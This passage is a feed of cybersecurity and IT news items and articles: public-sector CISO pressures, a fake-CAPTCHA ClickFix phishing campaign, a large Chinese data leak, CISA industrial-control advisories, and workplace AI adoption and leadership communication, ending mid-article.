In a time when digital transformation is the backbone of public services, Chief Information Security Officers (CISOs) in government and public sector (Gov/PS) organizations are being stretched thin. Charged with safeguarding the integrity of systems that support national security, emergency services, and citizen welfare, these leaders face mounting pressure in an increasingly volatile cyber threat landscape. But it’s more than just about attacks. The responsibility they shoulder affects everyone, from ensuring water flows safely through municipal pipes to keeping communication networks alive during a national emergency. The Complexity of the Modern Threat Landscape Over the past five years, rapidly shifting geopolitical dynamics have escalated cyberattacks on critical infrastructure. Adversaries are capitalizing on outdated IT systems, underfunded cyber defenses, and unclear governance models. Many Gov/PS institutions operate on legacy infrastructures, some decades old, making them vulnerable to exploits that modern enterprises have long outgrown. Despite efforts to modernize, CISOs report feeling overwhelmed. According to KPMG, 65% of public sector organizations hesitate to invest in new cyber technologies due to a lack of understanding or trust. It’s a paradox: the need for innovation is urgent, but trust in emerging tools remains elusive. Budget Gaps and Brain Drains Adding to the burden is the scarcity of resources. Budget constraints, coupled with a shortage of skilled professionals, hinder effective cyber defense strategies. With private-sector salaries often outpacing what governments can offer, attracting top-tier cybersecurity talent becomes a losing game. Even as emerging technologies like artificial intelligence (AI), blockchain, and quantum computing promise improvements in efficiency and resilience, they also bring new attack surfaces. Managing these innovations requires skills and resources that many public sector entities simply do not have. Regulatory Tensions: Compliance vs. Capacity In Europe alone, frameworks like the Digital Operational Resilience Act (DORA), the NIS2 Directive, and the Cyber Resilience Act are set to affect thousands of public organizations. While well-intentioned, these regulations can contribute to "compliance fatigue," stretching already limited teams to their breaking points. In this climate, a shift in mindset is essential. Cybersecurity in the public sector is no longer about preventing every incident; it’s about being able to detect, respond, and recover when (not if) a breach occurs. Building Resilience By Design The public sector runs on critical infrastructure, power grids, transport systems, water treatment plants. A single cyberattack on any of these can paralyze essential services. As threats grow more advanced, resilience needs to be designed into the system, not bolted on as an afterthought. That means identifying and securing all assets, including operational technology (OT) that lives outside traditional IT environments. Third-party risk is another growing concern. As public organizations rely more on external vendors, each new partnership potentially expands the attack surface. Strong incident response plans, realistic drills, and cross-functional collaboration can minimize the impact of attacks. More importantly, fostering a culture of resilience empowers every employee to become an active line of defense. The AI Dilemma: Trust vs. Innovation AI is fast becoming a staple in the Gov/PS toolkit, used in everything from traffic flow management to fraud detection. Yet, its adoption has outpaced discussions around trust and security. Poor-quality training data, opaque algorithms, and bias risks all threaten the credibility of AI systems. CISOs need to embed trust across the AI lifecycle, from data sourcing and model design to deployment and monitoring. This involves close collaboration with governance, IT, and business stakeholders to ensure data integrity and algorithmic transparency. Interestingly, there is progress. KPMG reports that 76% of public sector CISOs are now involved early in tech investment discussions. This early involvement enables the development of proactive, not reactive, AI security frameworks. Threats to AI: Model Poisoning and Beyond AI systems are increasingly being targeted by cybercriminals using techniques like adversarial attacks and model poisoning. These tactics can manipulate outputs, leading to decisions that may harm public safety or violate privacy regulations. Real-time monitoring, anomaly detection, and adaptive risk assessment must become standard practice. By embedding security throughout the AI development pipeline, CISOs can reduce the need for costly retrofits later. The Digital Identity Imperative With governments pushing digital-first strategies, secure digital identity systems are crucial. These systems underpin access to services like healthcare, banking, and social security. However, they are now facing attacks including deepfakes and automated credential theft. Machine identities, particularly those used in IoT systems, are also becoming a critical blind spot. These non-human service accounts often have elevated privileges, making them prime targets. CISOs must take the lead in developing transparent and secure identity frameworks. This means accounting for everything from biometric data protections to compliance with frameworks like GDPR and eIDAS. Trust and Public Expectation Public trust in digital systems is fragile. Any breach can quickly erode confidence and create long-term reputational damage. CISOs must prioritize privacy by design and actively communicate how citizen data is being used, stored, and protected. Collaboration is essential. Governments must work with private sector technology companies to develop interoperable, secure identity solutions. These partnerships can help bridge gaps in standards, regulation, and innovation. What Lies Ahead Most government and public sector organizations acknowledge the growing cyber risk, yet many remain underprepared. Legacy systems, funding shortages, and slow innovation adoption create a high-risk environment. Bridging the gap between recognition and action is no longer optional—it’s critical. CISOs must push for better funding, make cyber hygiene a boardroom issue, and promote a security-first culture across their organizations. By shifting focus from mere compliance to true resilience, they can ensure their institutions are not only secure but trusted by the communities they serve. As technology continues to evolve, so too must the strategies for securing it. The path forward requires courage, collaboration, and a renewed commitment to protecting the digital foundations of our public life.

https://thecyberexpress.com/why-government-cisos-are-near-breaking-point/
New phishing campaign hijacks clipboard via fake CAPTCHA for malware delivery
2025-06-06T12:05:04Z | 1749211504

A new wave of browser-based phishing tricks unsuspecting users into copy-pasting malicious commands into their systems, all while believing they’re completing a legitimate CAPTCHA verification. According to a SlashNext research, attackers have been found cloning the Cloudflare Turnstile interface, a privacy-preserving CAPTCHA alternative to verify if a user is human, to lure users into executing a malware. Commenting on why this is an absolute winner for the threat actors, Lionel Litty, chief security architect at Menlo Security, said, “These social engineering attacks are often successful because they astutely tap into users’ frustration: having to solve yet another CAPTCHA.” They then go on to provide instructions that are both obscure for many users and easy to follow, Litty added. In SlashNext observations, Victims were presented with a fake security check with real-looking branding and a Ray ID, a Cloudflare-assigned identifier. After clicking “Verify you are human,” users are guided through key presses that unknowingly paste and run a hidden PowerShell command copied to their clipboard. These ClickFix campaigns (including the one using TurnStile CACHE) were used to deliver a range of payloads, including information stealers such as Lumma and Stealc, as well as full-fledged remote access trojans (RATs) like NetSupport Manager designed for full system compromise. Fake Captcha used as new phishing frontier SlashNext researcher Daniel Kelley warned that the observed campaign signals threat actors moving from traditional phishing that involves direct prompting of a file download, to a more sophisticated ClickFix attack that looks like a legitimate security check. The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, they’re redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their system’s terminal or PowerShell. “When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure-Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses — including Win+R, Ctrl+V, and Enter — resulting in execution of the malware on their machine. “The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.” As defences have evolved and gotten better at blocking phishing email attachments that launch malicious code, threat actors have evolved their techniques, too, to find more creative ways to manipulate users into executing code, Maude noted. Fail-proof exploit of ‘verification fatigue’ SlashNext highlighted that the campaign’s success stems largely from its exploitation of human psychology. “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” Kelley added. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it looks routine.” The absence of immediate red flags like suspicious downloads, added with deceptive design using trusted branding and interface, provides a false sense of security. “We have seen an increasing number of this type of attack over the past several months and have had multiple customers inquire about possible ways to hinder the attack,” Litty said. “Because of their limited visibility into browser behavior, AV products and other endpoint protection solutions tend to miss these attacks.” Litty noted a need for browser-specific solutions, including tools for browser isolation, that can detect a website that writes content into the clipboard and flag it to users. ClickFix tactics aren’t anything new and have been picked up in recent years by nation-state actors, most notably in the “Contagious Interviews” campaign linked to the North Korea-aligned Kimsuky group. Other notable state-sponsored actors known for using ClickFix include MuddyWater(Iran), APT28 and UNK_RemoteRogue(Russia).

https://www.csoonline.com/article/4003056/new-phishing-campaign-hijacks-clipboard-via-fake-captcha-for-malware-delivery.html
Another data wiper found in Ukrainian critical infrastructure
2025-06-06T12:00:44Z | 1749211244

The new PathWiper, spotted in an attack on Ukrainian critical infrastructure, has similarities to wiper malware previously deployed by the Russian group known as Sandworm.

https://therecord.media/pathwiper-malware-critical-infrastructure-ukraine
Your ransomware nightmare just came true – now what?
2025-06-06T11:30:08Z | 1749209408

Don't negotiate unless you must, and if so, drag it out as long as you can Feature  So, the worst has happened. Computer screens all over your org are flashing up a warning that you've been infected by ransomware, or you've got a message that someone's been stealing information from your server.

https://go.theregister.com/feed/www.theregister.com/2025/06/06/ransomware_negotiation/
Colossal breach exposes 4B Chinese user records in surveillance-grade database
2025-06-06T11:25:45Z | 1749209145

A colossal data breach has reportedly exposed approximately four billion records containing personal information of hundreds of millions of users, primarily from China. The 631-gigabyte database was discovered sitting wide open on the internet, lacking even the most basic password protection, >according to cybersecurity firm Cybernews, which reported its findings based on its own research. What makes this breach particularly alarming isn’t just its size, though at four billion records, it’s believed to be the largest single-source leak of Chinese personal data ever found — it’s the breadth and depth of information that was exposed. According to the report, the researchers stumbled upon what appears to be a digital goldmine for anyone looking to build comprehensive profiles on Chinese citizens while working with cybersecurity researcher Bob Dyachenko of SecurityDiscovery.com. The researchers feel that the dataset was “meticulously gathered and maintained for building comprehensive behavioral, economic, and social profiles of nearly any Chinese citizen.” “The sheer volume and diversity of data types in this leak suggests that this was likely a centralized aggregation point, potentially maintained for surveillance, profiling, or data enrichment purposes,” the report added. WeChat data and financial information leaked After this massive discovery was made, the researchers reported that the database was taken offline. But before it vanished from public view, researchers managed to peek inside and found 16 distinct data collections — each one a treasure trove of personal information, as they put it. The crown jewel was a collection called “wechatid_db” with more than 805 million records, almost certainly pulled from WeChat, the ubiquitous Chinese super-app that’s become as essential as breathing for many users. But the financial data is where things get truly scary. Imagine having your payment card numbers, birthdate, name, and phone number stored in a database labeled simply “bank” — that’s exactly what happened to over 630 million people. Add to that another 300 million records from Alipay, China’s dominant mobile payment platform, and you’ve got a cybercriminal’s dream come true. The cherry on top? A collection of over 780 million home addresses, complete with geographic details. Suddenly, bad actors don’t just know what you spend—they know where you live and what you buy. Surveillance and profiling capabilities raise concerns Here’s the thing that keeps security experts up at night: this wasn’t just a random data dump. The meticulous organization and sheer scope suggest someone was building detailed dossiers on Chinese citizens. The exposed data reads like a surveillance state’s wish list. Beyond the financial and contact information, there were collections covering everything from gambling habits to vehicle registrations, employment details, and pension information. According to the report, one collection, ominously named in Mandarin characters translating to “three-factor checks,” contained over 610 million records with what researchers believe were user IDs, phone numbers, and usernames — the holy trinity for identity verification. The database also contained more than 353 million additional records spread across nine collections covering gambling activities, vehicle registrations, employment information, pension funds, and insurance data. Researchers identified one collection, “tw_db,” as potentially containing Taiwan-related information. “There’s no shortage of ways threat actors or nation states could exploit the data,” the report added. “With a data set of that magnitude, everything from large-scale phishing, blackmail, and fraud to state-sponsored intelligence gathering and disinformation campaigns is on the table.” Attribution remains elusive as the database disappears Despite extensive investigation, the Cybernews team could not identify the database’s owners or operators. The exposed instance was quickly taken offline after discovery, preventing researchers from conducting deeper analysis or determining attribution. “Individuals who may be affected by this leak have no direct recourse due to the anonymity of the owner and lack of notification channels,” the research team noted. The scale and sophistication of the data aggregation suggest significant resources and technical capabilities behind the operation. Researchers indicated that collecting and maintaining such a comprehensive database requires substantial time, effort, and infrastructure typically associated with nation-state actors, organized threat groups, or well-resourced research organizations. China’s ongoing data security challenges This breach represents the latest in a series of significant data exposures affecting Chinese users. Previous incidents, the Cybernews researchers have conducted, included leaks affecting 1.5 billion records from Weibo, DiDi, and Shanghai Communist Party databases, as well as another breach exposing 1.2 billion Chinese user records. More recently, attackers leaked 62 million iPhone users’ records online. “However, we could not identify any data leak that surpasses four billion records,” the report said. “That would make this data leak the largest single-source leak of Chinese personal data ever identified.”

https://www.csoonline.com/article/4003037/colossal-breach-exposes-4b-chinese-user-records-in-surveillance-grade-database.html
#Infosec2025: Top Six Cyber Trends CISOs Need to Know
2025-06-06T11:15:00Z | 1749208500

Experts at Infosecurity Europe 2025 highlighted a range of major industry trends, from advanced social engineering techniques to vulnerability exploits

https://www.infosecurity-magazine.com/news/cyber-trends-cisos-know/
How Retail Media Can Make Cash Registers Ring
2025-06-06T11:15:00Z | 1749208500

Retail media is an opportunity for retailers to generate additional revenue by selling physical and digital advertising space.

https://news.sap.com/2025/06/how-retail-media-can-make-cash-registers-ring/
Stop chasing AI for AI’s sake
2025-06-06T11:14:00Z | 1749208440

When I first began advising organizations on AI implementation and adoption, I noticed a concerning trend: Organizational leaders were fixated on the hype cycle, yet lacked a clear understanding of why it mattered to their business or where it could have an impact. Boards and leadership teams asked their executive(s) responsible for data superficial questions, such as “what are we doing with AI,” with no connection, alignment or engagement to company strategies or goals. But behind the C-suite and boardroom questions was a more fundamental disconnect. AI efforts weren’t grounded in business priorities. And worse, they weren’t connected to the people expected to enable or adopt them. In one large enterprise, I witnessed firsthand how disjointed communication about AI led to employee disillusionment. Leadership poured millions into automation technologies without aligning initiatives to job design, reskilling paths or incentives. Meanwhile, that same disjointed internal messaging about AI left employees feeling demoralized and unmotivated to support or enable data and AI transformation. Gartner describes the employee experience as a “fear of the unknown” in 3 barriers to AI adoption. The friction between people, processes and systems that is constantly left unaddressed is the real problem.  This friction can be observed in: An increased willingness from leaders to invest millions in technology upgrades despite ambiguity on purpose A decreased willingness and active divestment from upskilling or changing legacy behaviors Ask a manager if you can attend a conference or take a paid course to upskill so that you can acquire the relevant skills for an AI-enabled workforce and suddenly there’s no budget. The demonstrated selectiveness to invest in technology and not the workforce sends a loud, clear message to employees. However, as noted by Gartner,  the first barrier organizations will face in attempting AI transformation is skills or the lack of skills to successfully drive AI transformation.  So why are we surprised that AI “isn’t delivering?” The truth is you can’t succeed without your people and that requires T.R.U.S.T.:  Transparency. Is data openly accessible, clearly defined and easy to challenge? Relationships. Are cross-functional teams collaborating…or competing for control? Understanding. Do your people have the literacy and support they need to feel confident using data? Safety. Can employees ask questions, surface risks or say “I don’t know” without fear? Tone from the top. Is there transparency, training, intentional change management and incentives to adopt the change?  AI resistance isn’t technical, it’s tribal  Every time a headline drops about AI taking jobs, a CDAI or CIO somewhere dreads the conversations that follow. What I’ve seen across industries is that resistance to AI isn’t about the algorithms. It’s about power, protection and identity.  For example, a client introduced a language model to help their compliance team reduce manual review. The tech worked, but employees pushed back hard. Why? Because no one had clarified how their work would evolve, only that it would “change.” McKinsey makes the following statement about how data leaders can help employees overcome their fear of the unknown: “Senior leaders could counter employees’ prevailing fears of ‘replacement and loss’ with messaging about gen AI’s potential for ‘augmentation and improvement’ and its ability to significantly enhance the employee experience.”   When employees believe their role is threatened, they hoard knowledge, resist and reject process changes. In addition, failure to address those concerns ensures lost opportunities to engage, collaborate and collectively experience positive value from embracing AI. Employees aren’t resisting AI because they don’t understand the technology; they resist because they fear being made irrelevant. Without psychological safety, AI adoption becomes a power struggle. And when that fear festers, teams lose the very collaboration and curiosity that makes innovation possible. Without a clear story, friction takes over, initiatives fail and organizations lose time, money, morale and productivity. We have to build incentive structures that reward frictionless behavior: knowledge sharing, sharing data, aligning cross-functionally, admitting uncertainty and testing fast. That’s a cultural retrofit not a technical one. Design for AI by starting with structure, not software The reality is that many of your legacy constructs, including organizational structures and processes, will be impacted as you introduce AI into your organization. Large organizations, unlike AI-native startups, can’t take a lean-first approach because the strategic knowledge needed to invest smartly is embedded in the workforce, not just the executive suite. Designing for AI means doing the opposite of what most roadmaps suggest: it means starting with the organizational chart and business goals, not the model. Why does this matter? In “AI will evolve into an organizational strategy for all,” Wired’s Ethan Wollic presents a compelling case that the future will bring: “A surge in ‘AI-native’ startups that build their entire operational model around human-AI collaboration from day one. These companies will be characterized by small, highly skilled human teams working in concert with sophisticated AI systems to achieve outputs that rival those of much larger traditional organizations.” In the same article, Wollic argues that, in contrast, large enterprises will derive value from AI transformation through workers and managers across departments who identify meaningful ways to use AI to enhance performance. This underscores the critical role of employees in surfacing opportunities, shaping implementation and ensuring adoption. Unlike startups that are built lean by design, enterprises must first unlock and integrate the operational intelligence that already exists within the workforce, but most AI strategies skip it entirely. Diagnose and dismantle the real barriers to scale In a recent engagement with a multinational client, we conducted what I call an “AI friction audit.” We mapped the places where AI initiatives had failed to scale, and what we found wasn’t surprising, but it was telling. The greatest barriers weren’t technical. They were structural and cultural: political competition between departments, unclear decision rights, lack of consensus on value and zero shared incentives for collaboration. These weren’t isolated pain points; they were system-wide design flaws. The resulting conversations helped the leadership team understand what their roadmap had overlooked: that AI changes power dynamics, workflows and the very DNA of an organization. When your structures and incentives don’t evolve with the technology, the implementation breaks under the weight of unresolved tensions. Strategies that ignore these embedded challenges such as conflicted decision-making, misaligned priorities and functional silos, lack the foundational conditions required for success. Yet many AI roadmaps still treat the org chart as fixed, decision-making as siloed, and value conflicts as someone else’s problem. Redesigning for AI means starting with the people and dismantling the legacy constructs that make collaboration optional rather than essential. One of the biggest mistakes I see is designing AI roadmaps around the technology, then attempting to retrofit them into the business. That’s backwards. Joshi, Su, Austin and Sundaram described this dynamic in their article “Why so many data science projects fail to deliver” as the classic “hammer in search of a nail.” You can’t drive adoption through capability alone. You drive it through behavior. Cross-functional alignment, proactive data sharing, surfacing uncertainty early and rapid testing aren’t just tactics. They are behavioral signals of a healthy culture that’s ready to absorb change.  If your AI roadmap doesn’t start with people, it’s already off course The uncomfortable truth is that many company cultures are barriers to AI adoption. The lack of investment in people, buy-in and alignment will continue to be an insurmountable friction point for organizations unwilling to confront the human side of transformation. Data leaders must stop seeing AI as a technical challenge and start leading like cultural architects because the organizations that will win with AI will be those that invest in behavior change and upskilling. That means sharing the vision early, involving your people in co-creation, upskilling for the future of work and rewarding behaviors that make adoption possible using the S.M.I.L.E. framework: Start AI roadmaps with a culture audit. Make behavioral metrics part of AI KPIs. Incentivize knowledge sharing, sharing data, aligning cross-functionally, admitting uncertainty and testing fast across silos. Lead with change management to drive alignment, accelerate adoption and ensure lasting impact, rather than treating it as an afterthought. Emphasize AI as an enabler of team augmentation, not a source of disruption. When all else fails, just S.M.I.L.E. This article is published as part of the Foundry Expert Contributor Network.Want to join?

https://www.cio.com/article/4002485/stop-chasing-ai-for-ais-sake.html
U.S. Offers $10M bounty for info on RedLine malware creator and state hackers
2025-06-06T11:12:23Z | 1749208343

The U.S. offers up to $10M for info on state hackers linked to RedLine malware and its creator, Maxim Rudometov, tied to attacks on U.S. infrastructure. The U.S. Department of State offers a reward of up to $10 million for information nation-state actors linked to the RedLine infostealer and its alleged author, Russian national Maxim […]

https://securityaffairs.com/178712/cyber-crime/u-s-offers-10m-bounty-for-info-on-redline-malware-creator-and-state-hackers.html
MIND Raises $30 Million for Data Loss Prevention
2025-06-06T11:10:57Z | 1749208257

Data security firm MIND has raised $30 million in Series A funding to expand its R&D and go-to-market teams. The post MIND Raises $30 Million for Data Loss Prevention appeared first on SecurityWeek.

https://www.securityweek.com/mind-raises-30-million-for-data-loss-prevention-platform/
Cloud breaches are surging, but enterprises aren’t quick enough to react
2025-06-06T10:58:48Z | 1749207528

The rise in cloud breaches has been attributed to a series of factors

https://www.itpro.com/cloud/cloud-security/cloud-breaches-check-point-security-report
US offers $10 million reward for tips about state-linked RedLine hackers
2025-06-06T10:56:17Z | 1749207377

How would you like to earn yourself millions of dollars? Well, it may just be possible - if you have information which could help expose the identities of cybercriminals involved with the notorious RedLine information-stealing malware. Read more in my article on the Tripwire State of Security blog.

https://www.tripwire.com/state-of-security/us-offers-10-million-reward-tips-about-state-linked-redline-cybercriminals
Qilin Ransomware Allegedly Targets 11 International Organizations
2025-06-06T10:51:20Z | 1749207080

The ransomware group known as Qilin has allegedly updated its dark web leak site, claiming responsibility for attacks on 11 new victims spanning various sectors, including healthcare, government, technology, and manufacturing. The group has published the allegedly stolen data for each entity. The diverse list of targets underscores the opportunistic and far-reaching nature of modern […]

https://dailydarkweb.net/qilin-ransomware-allegedly-targets-11-international-organizations/
CISA Issues 7 ICS Advisories Targeting Critical Infrastructure Flaws
2025-06-06T10:30:58Z | 1749205858

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released seven new ICS advisories, each highlighting cybersecurity vulnerabilities in key Industrial Control Systems across energy, communications, emergency response, and manufacturing sectors.   The alerts shed light on remotely exploitable flaws discovered in devices and software produced by CyberData, Hitachi Energy, and Mitsubishi Electric—names synonymous with modern operational technology (OT).   A Breakdown of the Latest ICS Advisories  The first advisory, ICSA-25-155-01, addresses multiple high-impact issues in CyberData’s 011209 SIP Emergency Intercom. With a CVSS v4 severity score of 9.3, this vulnerability, reported by Claroty researcher Vera Mens, enables authentication bypass, SQL injection, and path traversal. Affected systems using firmware versions prior to 22.0.1 are vulnerable to remote code execution and denial-of-service attacks. CISA recommends upgrading to version 22.0.1 and advises isolating the intercoms from public networks using firewalls and VPNs.  The second alert, ICSA-25-155-02, involves a critical integer overflow in Hitachi Energy’s Relion 670, 650 series, and SAM600-IO devices. The flaw resides in the VxWorks OS memory allocator and holds a CVSS v3 score of 9.8. Exploitation could lead to memory corruption, potentially crippling protective relays in power systems. Multiple firmware subversions across series 1.1 to 2.2.5 are affected. Mitigation entails upgrading to version 2.2.5.2 or applying interim workarounds provided by Hitachi.  ICSA-21-049-02 (Update H) highlights vulnerabilities in Mitsubishi Electric’s broad range of FA Engineering Software, such as GX Developer, GT Designer3, and RT ToolBox2. With a CVSS v4 score of 8.7, attackers can exploit heap-based buffer overflows to crash the software or interfere with PLC diagnostics in factory automation environments. Users are advised to install the latest updates—e.g., GX Developer version 8.507D+ and RT ToolBox2 version 3.74C+.  Continued Focus on Hitachi Energy’s Industrial Control Systems  CISA’s June release includes updates to prior ICS advisories concerning Hitachi Energy’s Relion products and IEC 61850 MMS Server implementations. Notable among them:  ICSA-25-133-02 details CVE-2023-4518, where malformed GOOSE messages could cause vulnerable Relion firmware versions to reboot, creating a denial-of-service condition. Firmware series 2.2.0.x to 2.2.5.6 are affected, and the agency recommends upgrading to secure versions such as 2.2.2.6 or 2.2.3.7.  ICSA-23-068-05 (CVE-2022-3864) uncovers weaknesses in firmware signature validation. If exploited by an authenticated attacker, this vulnerability could lead to unauthorized firmware uploads. Affected firmware spans across versions 2.2.0 to 2.2.5.5.  ICSA-21-336-05 is about outdated VxWorks boot components in the Relion series. CVE-2021-35535, with a CVSS v4 score of 8.9, references known “Urgent/11” vulnerabilities that could allow TCP session hijacking or packet injection. Users must patch to at least version 2.2.2.5 or apply physical and network isolation strategies.  ICSA-23-089-01 points to a medium-severity issue (CVE-2022-3353) in Hitachi’s IEC 61850 MMS Server, where malformed client requests can block new connections. Though scoring a 5.9, it could still disrupt operations under targeted conditions.  Conclusion   CISA’s latest ICS advisories highlight the urgent need for critical infrastructure operators to secure vulnerable systems against remote exploitation. With many legacy ICS components lacking basic protections, the risks are growing, but so are the tools. CISA’s guidance offers a clear roadmap: patch systems, segment networks, restrict access, monitor threats, and train staff.

https://thecyberexpress.com/cisa-ics-advisories/
Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV
2025-06-06T10:30:00Z | 1749205800

Cybersecurity involves both playing the good guy and the bad guy. Diving deep into advanced technologies and yet also going rogue in the Dark Web. Defining technical policies and also profiling attacker behavior. Security teams cannot be focused on just ticking boxes, they need to inhabit the attacker’s mindset. This is where AEV comes in. AEV (Adversarial Exposure Validation) is an advanced...

https://thehackernews.com/2025/06/inside-mind-of-adversary-why-more.html
Workshop – Pivoting Across Infrastructure to Detect Unknown Threats
2025-06-06T10:27:16Z | 1749205636

Join us for an interactive online session designed for those new to threat hunting in the Silent Push platform. Adversary infrastructure is often hidden or unused—escaping detection by most CTI tools — until it’s suddenly activated in an attack. Learn how to uncover the 98% of malicious infrastructure that typically goes undetected. We’ll show you […] The post Workshop – Pivoting Across Infrastructure to Detect Unknown Threats appeared first on Silent Push.

https://www.silentpush.com/news/workshop-detect-unknown-threats/
Destructive ‘PathWiper’ Targeting Ukraine’s Critical Infrastructure
2025-06-06T10:20:27Z | 1749205227

A Russia-linked threat actor has used the destructive malware dubbed PathWiper against a critical infrastructure organization in Ukraine. The post Destructive ‘PathWiper’ Targeting Ukraine’s Critical Infrastructure appeared first on SecurityWeek.

https://www.securityweek.com/destructive-pathwiper-targeting-ukraines-critical-infrastructure/
8 communication strategy tips for IT leaders
2025-06-06T10:01:00Z | 1749204060

Leading a technical team, being the voice of technology in the C-suite, and communicating with your company’s business groups about their IT needs and hazards is a job that requires a deep understanding of technology. But more and more, it also requires the skills of an expert negotiator, speech writer, and public relations expert. In a single day, perhaps even in a single hour, you might go from explaining a technical decision to a financial executive to listening to an acronym-laden description of the hiccups in an AI deployment. As business communication expands across channels and technology evolves into the beating heart of the business, the role of the technical leader has become one that requires strong communications skills. More than that, it requires a big-picture communication strategy that is clear and effective. I asked CIOs and other leaders what they do. This is the advice they offered on developing an effective communication strategy for IT leadership. Speak in the vernacular of your audience When discussing the details of a technical implementation with your team, your language might be littered with acronyms, jargon, and highly technical language. But when you speak to other business groups, company leaders, and less technical people, you will miss the mark if you speak in the vernacular of the nerd. “Talking to the engineering team is a very different conversation than talking to the executive team,” says Eric Johnson, CIO at PagerDuty. “Technical speak is the kiss of death for a CIO.” For a less technical audience, shift to storytelling. Adopt the dialect of the business units, focus on the business problem the technology solves, and leave the specs and speeds out of it altogether. “Think about your audience,” says Guillermo Carreras, AVP of delivery at BairesDev. “Do you need to get into the detailed technical execution or is the overall vision enough? Is the result more important than the implementation? Should you use simple language instead of technical jargon?” The channel you use to discuss topics is part of this equation. Some people want to read specs, some conversations should be done face to face, and there are times when email is the best way to deliver news. With so many channels for communicating your message, the lingua franca you choose is as much about the forum as it is about the words you use. Use every communication channel you have “You cannot communicate enough, and you must use every method available: Slack channels, all-hands meetings, blogs, internal web pages, sharing mission, publishing roadmaps, etc.,” says Ann Funai, CIO and VP of business platform transformation at IBM. You might have a personal preference for email, Slack, or the phone. You might prefer never to receive a work text. But you have to meet your team and the C-suite where they are. “People are going to communicate with you in whichever way is more natural and effective for them and you have to be able to manage that communication,” PagerDuty’s Johnson says. “Some folks like content coming through Slack, others absorb it better visually in a town hall, and some want office hours. As a CIO, you have to be proficient in all of those things.” Keep in mind, though, that these channels can spin out of control without guardrails, rules about engagement, and protocols. As the technical lead, establishing these rules will likely fall to you. Define how best to use each channel Many people and companies allow personal preferences to define the forum they communicate in. But personal preference is not the only — or even the best — way to define how you use channels. For Energy Solutions CIO David Weisong’s teams, the channel is governed by the urgency and type of message. Email is reserved for conveying announcements that aren’t pressing, while certain Slack channels and SMS messages are akin to red alerts. The company doesn’t use email for urgent messages because there is an agreement that emails can be dealt with anytime in, say, 24 hours. But when the message arrives via an urgent channel, you drop everything and pay attention. This, of course, includes an agreement that the emergency channels will never be used for frivolous or non-urgent messages. For Sudhakar Velamoor, CTO of Kalderos, the channel is often governed by the technical level of the topic. “We go to Slack when we are trying to be specific,” he says. “You can convey an idea in a meeting or video call. But there is more precision in a Slack conversation.” The asynchronous nature of Slack also allows time to form a precise answer. Keep context front of mind Whatever channel you use, it is important to keep the high-level message clear. “Make sure people understand where the conversation is coming from,” says Velamoor, “especially for technology teams communicating specifications. Set up the context so people understand what they’re reading and why they’re reading it.” Without this high-level clarity, it is easy for communication to slide away from the goal and deliver an unintended message. “We start with how we are doing against our OKRs,” says Cameron van Orman, chief strategy officer at Planview, referring to the objectives and key results (OKR) goal-setting framework. “We have all-hands meetings, a company kickoff,” he says, along with all the usual channels of communication. Everyone makes sure these objectives are front and center in those. “But what’s more interesting is that they live and are visible in our tooling, in our agile planning software.” Often, van Orman says, objectives — financial goals and product goals, for example — are looked at only occasionally. “OKRs are often in a performance management system or parked in a finance tool,” he says. Keeping these OKRs front and center flips the focus from the project to the outcome. It changes the mindset. “It is subtle,” he says. “But it’s impactful to start by asking if we are doing the right things.” Velamoor agrees. “Connect your work to the overall business goal,” he says. “This can make priorities change, especially in a dynamic environment. Set the context and the business goal you are marching toward.” Use face-to-face meetings to strengthen other channels Communicating with a remote team brings its own challenges. If all communication happens through email, video calls, and messaging, some of the connective tissue of human interaction gets lost. Energy Solutions discovered this in exit interviews, Weisong says. People were leaving, especially those relatively new to the workforce, because they didn’t feel connected to the job or company. To answer this, the company now invests in regular, company-wide, in-person meetings and asks new hires to work at one of the company’s offices. This has helped provide a foundation for new people to attach to. “It’s like when you plant a tree, you put a stake next to it to keep it growing up and not get blown over. So, it can take root,” he says. The effort has been very effective at providing new team members with cohorts, colleagues, and a sense of belonging. The connection these in-person meetings create bolsters the communication among everyone in the company, too. When you know someone, even only slightly, their messages come with a more accurate flavor of their personality and style. “It makes interactions through other mediums easier,” says Weisong. “You have a basis for understanding that person.” Train people to communicate Communication is complicated. Not everyone is good at it. Because of this, most leaders I spoke to make it a part of their communications strategy to teach this skill. This might include the specific rules around communicating — what’s private, what channels should be used, what content is contractually sensitive — but some of it is more general, such as when to escalate a chat to a meeting, what sort of topics should be discussed in person or at least on video, how to be respectful, what is rude, when behavior crosses over into harassment. “We have a big initiative around confidential and proprietary information,” says Energy Solutions’ Weisong. “We’ve trained for that as a company. And then things like security, compliance, and risk are woven in. We also teach what can and cannot be shared in Slack channels.” The company’s communication training also covers basic guidelines about how to avoid and handle conflict, when to escalate a conversation to a phone call or Zoom meeting, and how to be sure your message was received.    Learn to listen When you are communicating, you have to do more than look for effective ways to convey your message. Real communication is like a telephone: It works in both directions. If you are speaking but not listening, you aren’t communicating. “Learn to listen and invest time in doing so,” says Carreras. “Your team has valuable input. Make time to connect with them and actively listen to their concerns, suggestions, and ideas. This will elevate your communication skills and help you build a great relationship with them.” Be sure you aren’t only listening to people who agree with you or tell you what you want to hear, though. This has been the downfall of many great leaders. When you listen only to messages that are easy to hear, you become isolated and disconnected. “Create space for perspectives that differ from your own,” IBM’s Funai says. “We must be willing to evaluate and weigh different viewpoints so that we can come to a solution that benefits key stakeholders and the business overall.” Develop a communication cadence Daily Slack conversations, stand-up meetings, and emails are usually focused on the work at hand and leave little room to connect with your teams, colleagues, or other business leaders about the big picture or the personal. Connecting around these things, though, is the fabric of communication. It holds everything else together. “I have found it to be incredibly helpful to force a regular cadence into conversations with key business partners,” PagerDuty’s Johnson says. “There’s so much information flying around and things happen quickly. If you don’t have regular check-ins, where you review the status of shared priorities and consider anything new, things get out of alignment.” This is true in every relationship you have in your organization — from the leadership team to the people who look to you for guidance. “I meet with every single person in my department,” says Weisong. “I see some of these people every other day in meetings. But that is all about the agenda. I need to make sure I understand how they are doing on a personal level, what’s going on 